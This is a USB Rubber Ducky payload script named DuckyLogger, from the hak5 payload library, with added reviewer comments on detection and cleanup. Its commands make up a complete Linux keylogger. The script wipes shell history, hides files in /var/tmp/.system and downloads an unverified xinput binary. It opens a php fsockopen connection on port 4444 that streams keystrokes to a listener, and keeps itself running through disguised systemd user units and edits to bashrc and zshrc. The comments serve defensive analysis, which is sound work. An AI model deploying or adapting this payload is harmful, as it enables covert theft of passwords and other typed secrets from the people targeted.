hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/credentials/DuckyLogger/payload.txt
REM Title: DuckyLogger
REM Description: Keylogger that sends every keystroke typed on the target to a remote or local listener.
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Credentials
REM Target: Unix-like operating systems with systemd
REM Attackmodes: HID
REM [Note]
REM Visit https://github.com/drapl0n/DuckyLogger for usage and other important instructions.
REM [keeping tracks clear]
DELAY 500
REM NOTE(review): Ctrl-Alt-T presumably opens a terminal through the desktop's default shortcut - confirm per desktop.
REM Every STRING below is typed into the logged-in user's session, so the payload needs an unlocked screen.
REM Relevant controls: screen locking when unattended and an allow-list for new USB HID devices (e.g. USBGuard).
CTRL-ALT t
DELAY 400
REM NOTE(review): anti-forensics step. Sets HISTSIZE=0, deletes the file $HISTFILE points to and unsets HISTFILE,
REM so the commands typed below are not recorded in shell history and the user's existing history file is removed.
REM Detection: a history file that vanishes mid-session. Process-execution auditing (e.g. auditd execve records)
REM does not depend on shell history and still records the external commands typed below (mkdir, wget, chmod, systemctl).
STRING export HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
ENTER
DELAY 100
REM [creating key logging mechanism]
REM NOTE(review): staging directory for everything this payload drops. The dot-prefixed name keeps it out of a plain
REM `ls`; /var/tmp is writable by unprivileged users and is typically kept across reboots (confirm per distribution).
REM IoC: /var/tmp/.system/ containing the files sys, xinput, systemBus and reboot.
STRING mkdir /var/tmp/.system
ENTER
DELAY 100
REM NOTE(review): writes the capture script /var/tmp/.system/sys. It runs the dropped xinput binary: `xinput list`,
REM a grep that extracts the ids of devices listed as "slave keyboard", then one `xinput test <id>` per id in
REM parallel (xargs -P0 -n1). `xinput test` prints key press/release events for an X11 input device and needs no root.
REM Presumably this depends on an X11 session - confirm behaviour under Wayland.
REM Detection: long-running `xinput test` processes the user did not start, especially with an executable under /var/tmp.
STRING echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/sys
ENTER
DELAY 100
REM [importing xinput]
STRING cd /var/tmp/.system/
ENTER
DELAY 100
REM NOTE(review): fetches a file named xinput (presumably a prebuilt copy of the xinput utility - not verified here)
REM from the author's repository. --no-check-certificate turns off TLS certificate validation and no checksum is
REM compared, so the file that lands on disk is whatever the responding server returns; treat it as untrusted.
REM Detection: wget from an interactive shell to this URL, followed by chmod +x on a file under /var/tmp;
REM an executable called xinput outside package-managed paths.
STRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true
ENTER
DELAY 2500
STRING chmod +x xinput
ENTER
DELAY 100
REM [creating reverse shell]
REM NOTE(review): writes /var/tmp/.system/systemBus, an endless loop that pings an address and then uses
REM `php -r` with fsockopen() to open a TCP connection on port 4444 and run /var/tmp/.system/sys with its
REM stdin/stdout/stderr redirected to descriptor 3, i.e. the capture output goes out over that connection.
REM 0.0.0.0 (and possibly the port) look like placeholders set per the author's README - confirm; do not key
REM detections on them. The step depends on php being installed on the target.
REM The exact text written depends on how the interactive shell expands this double-quoted string, so match on
REM stable substrings (the /var/tmp/.system paths, fsockopen) rather than on the whole file.
REM Detection: php started with -r and fsockopen in its arguments, a php process holding an outbound socket,
REM repeated ICMP echo from a user-level service.
STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/systemBus
ENTER
DELAY 100
REM [creating systemd service to execute payload on boot]
STRING mkdir -p ~/.config/systemd/user
ENTER
DELAY 200
REM NOTE(review): persistence without root. Creates the user unit ~/.config/systemd/user/systemBUS.service whose
REM ExecStart is `/bin/bash /var/tmp/.system/systemBus -no-browser`, with Restart=on-failure and
REM WantedBy=default.target. A user unit starts with that user's systemd manager (normally at login; at boot only
REM if lingering is enabled for the account). The Description text resembles a system component name.
REM The script does not read its -no-browser argument; it is only visible in the process command line.
REM Detection: `systemctl --user list-unit-files`; unit files under ~/.config/systemd/user whose ExecStart points
REM into /var/tmp or another world-writable directory.
STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
ENTER
DELAY 100
REM [creating reboot script in case the listener stops or the target's internet connection is lost]
REM NOTE(review): writes /var/tmp/.system/reboot, a watchdog loop that restarts systemBUS.service every 15 minutes.
REM Despite the file name it does not reboot the host. Detection: a periodic `systemctl --user restart
REM systemBUS.service` in the user journal at a fixed 15-minute interval.
STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/reboot
ENTER
DELAY 100
REM [creating systemd service to execute the reboot script on boot]
REM NOTE(review): second user unit, ~/.config/systemd/user/reboot.service, which runs the watchdog script
REM /var/tmp/.system/reboot with the same Restart/exit-status settings as systemBUS.service.
REM The unit name is generic; identify it by its ExecStart path (/var/tmp/.system/reboot), not by its name.
STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
ENTER
DELAY 100
REM [enabling service]
STRING systemctl --user daemon-reload
ENTER
DELAY 300
REM NOTE(review): `enable --now` both starts the unit immediately and registers it for later sessions. With
REM WantedBy=default.target, enabling a user unit creates a symlink under
REM ~/.config/systemd/user/default.target.wants/ - a further artifact to check and remove during cleanup.
STRING systemctl --user enable --now systemBUS.service
ENTER
DELAY 150
STRING systemctl --user enable --now reboot.service
ENTER
DELAY 100
REM [autostarting service on terminal/shell launch]
REM NOTE(review): second persistence path. Writes a helper script ~/tmmmp that, when a name matching zshrc or
REM bashrc is found by `ls -a` in the current directory, appends
REM `systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service`
REM to ~/.zshrc and ~/.bashrc. Every new interactive shell then re-enables and restarts both units.
REM For responders: disabling the units is not enough; the appended line must also be removed from the rc files,
REM otherwise the next terminal the user opens re-enables them while the unit files still exist.
STRING echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
ENTER
DELAY 100
REM NOTE(review): runs the helper from the home directory, deletes it and closes the terminal, so ~/tmmmp itself
REM does not remain on disk. What does remain: /var/tmp/.system/ (sys, xinput, systemBus, reboot), the unit files
REM ~/.config/systemd/user/systemBUS.service and reboot.service, and the line appended to ~/.zshrc / ~/.bashrc.
REM Cleanup order: disable and stop both user units, remove the unit files and the rc-file line, delete the
REM staging directory, then run `systemctl --user daemon-reload`.
STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
ENTER